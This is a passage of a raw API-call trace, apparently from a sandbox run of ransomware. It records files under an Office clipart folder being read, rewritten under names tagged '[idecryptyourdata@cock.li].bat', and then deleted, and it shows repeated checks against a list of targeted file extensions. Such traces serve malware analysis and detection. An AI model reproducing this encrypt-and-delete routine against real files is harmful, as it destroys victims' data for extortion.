(hObject=0x380) returned 1 [0183.112] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.112] SetEndOfFile (hFile=0x334) returned 1 [0183.113] CloseHandle (hObject=0x334) returned 1 [0183.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.113] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf")) returned 1 [0183.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.114] lstrlenW (lpString=".doc") returned 4 [0183.114] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.114] lstrlenW (lpString=".docx") returned 5 [0183.114] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.114] lstrlenW (lpString=".pdf") returned 4 [0183.114] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.114] lstrlenW (lpString=".xls") returned 4 [0183.114] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.114] lstrlenW (lpString=".xlsx") returned 5 [0183.114] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.114] lstrlenW (lpString=".ppt") returned 4 [0183.114] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.114] lstrlenW (lpString=".zip") returned 4 [0183.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.114] lstrlenW (lpString=".rar") returned 4 [0183.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.114] lstrlenW (lpString=".bz2") returned 4 [0183.114] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.114] lstrlenW (lpString=".7z") returned 3 [0183.114] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.114] lstrlenW (lpString=".dbf") returned 4 [0183.114] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.115] lstrlenW (lpString=".1cd") returned 4 [0183.115] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.115] lstrlenW (lpString=".jpg") returned 4 [0183.115] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.115] lstrlenW (lpString=".doc") returned 4 [0183.115] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.115] lstrlenW (lpString=".docx") returned 5 [0183.115] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.115] lstrlenW (lpString=".pdf") returned 4 [0183.115] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.115] lstrlenW (lpString=".xls") returned 4 [0183.115] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.115] lstrlenW (lpString=".xlsx") returned 5 [0183.115] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.115] lstrlenW (lpString=".ppt") returned 4 [0183.115] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.115] lstrlenW (lpString=".zip") returned 4 [0183.115] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.115] lstrlenW (lpString=".rar") returned 4 [0183.115] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.115] lstrlenW (lpString=".bz2") returned 4 [0183.115] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.115] lstrlenW (lpString=".7z") returned 3 [0183.115] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.115] lstrlenW (lpString=".dbf") returned 4 [0183.115] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.116] lstrlenW (lpString=".1cd") returned 4 [0183.116] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 68 [0183.116] lstrlenW (lpString=".jpg") returned 4 [0183.116] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.116] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.116] lstrlenW (lpString="J0107192.WMF") returned 12 [0183.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.116] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=9968) returned 1 [0183.116] CloseHandle (hObject=0x334) returned 1 [0183.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf")) returned 0x220 [0183.117] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.117] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.117] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0183.117] GetLastError () returned 0x0 [0183.117] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x26f0, lpOverlapped=0x0) returned 1 [0183.119] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2700, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2700, lpOverlapped=0x0) returned 1 [0183.120] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.120] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.120] SetEndOfFile (hFile=0x380) returned 1 [0183.121] CloseHandle (hObject=0x380) returned 1 [0183.121] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.121] SetEndOfFile (hFile=0x334) returned 1 [0183.122] CloseHandle (hObject=0x334) returned 1 [0183.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.122] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf")) returned 1 [0183.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.122] lstrlenW (lpString=".doc") returned 4 [0183.122] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.123] lstrlenW (lpString=".docx") returned 5 [0183.123] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.123] lstrlenW (lpString=".pdf") returned 4 [0183.123] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.123] lstrlenW (lpString=".xls") returned 4 [0183.123] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.123] lstrlenW (lpString=".xlsx") returned 5 [0183.123] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.123] lstrlenW (lpString=".ppt") returned 4 [0183.123] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.123] lstrlenW (lpString=".zip") returned 4 [0183.123] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.123] lstrlenW (lpString=".rar") returned 4 [0183.123] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.123] lstrlenW (lpString=".bz2") returned 4 [0183.123] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.123] lstrlenW (lpString=".7z") returned 3 [0183.123] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.123] lstrlenW (lpString=".dbf") returned 4 [0183.123] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.123] lstrlenW (lpString=".1cd") returned 4 [0183.123] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.123] lstrlenW (lpString=".jpg") returned 4 [0183.123] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.123] lstrlenW (lpString=".doc") returned 4 [0183.123] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.123] lstrlenW (lpString=".docx") returned 5 [0183.124] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.124] lstrlenW (lpString=".pdf") returned 4 [0183.124] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.124] lstrlenW (lpString=".xls") returned 4 [0183.124] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.124] lstrlenW (lpString=".xlsx") returned 5 [0183.124] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.124] lstrlenW (lpString=".ppt") returned 4 [0183.124] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.124] lstrlenW (lpString=".zip") returned 4 [0183.124] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.124] lstrlenW (lpString=".rar") returned 4 [0183.124] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.124] lstrlenW (lpString=".bz2") returned 4 [0183.124] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.124] lstrlenW (lpString=".7z") returned 3 [0183.124] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.124] lstrlenW (lpString=".dbf") returned 4 [0183.124] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.124] lstrlenW (lpString=".1cd") returned 4 [0183.124] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 68 [0183.124] lstrlenW (lpString=".jpg") returned 4 [0183.124] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.124] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.124] lstrlenW (lpString="J0107254.WMF") returned 12 [0183.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.125] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=20212) returned 1 [0183.125] CloseHandle (hObject=0x334) returned 1 [0183.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf")) returned 0x220 [0183.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.125] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.125] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0183.126] GetLastError () returned 0x0 [0183.126] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x4ef4, lpOverlapped=0x0) returned 1 [0183.128] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x4f00, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x4f00, lpOverlapped=0x0) returned 1 [0183.129] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.129] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.129] SetEndOfFile (hFile=0x380) returned 1 [0183.130] CloseHandle (hObject=0x380) returned 1 [0183.130] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.130] SetEndOfFile (hFile=0x334) returned 1 [0183.130] CloseHandle (hObject=0x334) returned 1 [0183.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.131] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf")) returned 1 [0183.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.131] lstrlenW (lpString=".doc") returned 4 [0183.131] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.131] lstrlenW (lpString=".docx") returned 5 [0183.131] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0183.131] lstrlenW (lpString=".pdf") returned 4 [0183.131] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.131] lstrlenW (lpString=".xls") returned 4 [0183.131] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.131] lstrlenW (lpString=".xlsx") returned 5 [0183.131] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0183.131] lstrlenW (lpString=".ppt") returned 4 [0183.131] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.131] lstrlenW (lpString=".zip") returned 4 [0183.131] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.131] lstrlenW (lpString=".rar") returned 4 [0183.132] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.132] lstrlenW (lpString=".bz2") returned 4 [0183.132] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.132] lstrlenW (lpString=".7z") returned 3 [0183.132] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.132] lstrlenW (lpString=".dbf") returned 4 [0183.132] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.132] lstrlenW (lpString=".1cd") returned 4 [0183.132] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.132] lstrlenW (lpString=".jpg") returned 4 [0183.132] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.132] lstrlenW (lpString=".doc") returned 4 [0183.132] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.132] lstrlenW (lpString=".docx") returned 5 [0183.132] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0183.132] lstrlenW (lpString=".pdf") returned 4 [0183.132] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.132] lstrlenW (lpString=".xls") returned 4 [0183.132] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.132] lstrlenW (lpString=".xlsx") returned 5 [0183.132] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0183.132] lstrlenW (lpString=".ppt") returned 4 [0183.132] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.132] lstrlenW (lpString=".zip") returned 4 [0183.132] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.132] lstrlenW (lpString=".rar") returned 4 [0183.132] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.132] lstrlenW (lpString=".bz2") returned 4 [0183.132] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.132] lstrlenW (lpString=".7z") returned 3 [0183.132] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.133] lstrlenW (lpString=".dbf") returned 4 [0183.133] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.133] lstrlenW (lpString=".1cd") returned 4 [0183.133] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 68 [0183.133] lstrlenW (lpString=".jpg") returned 4 [0183.133] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.133] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.133] lstrlenW (lpString="J0107258.WMF") returned 12 [0183.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.133] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=8552) returned 1 [0183.133] CloseHandle (hObject=0x334) returned 1 [0183.133] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf")) returned 0x220 [0183.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0183.134] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.134] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0183.134] GetLastError () returned 0x0 [0183.134] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2168, lpOverlapped=0x0) returned 1 [0183.136] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2170, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2170, lpOverlapped=0x0) returned 1 [0183.137] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.137] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.137] SetEndOfFile (hFile=0x380) returned 1 [0183.137] CloseHandle (hObject=0x380) returned 1 [0183.137] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.137] SetEndOfFile (hFile=0x334) returned 1 [0183.138] CloseHandle (hObject=0x334) returned 1 [0183.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.138] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft 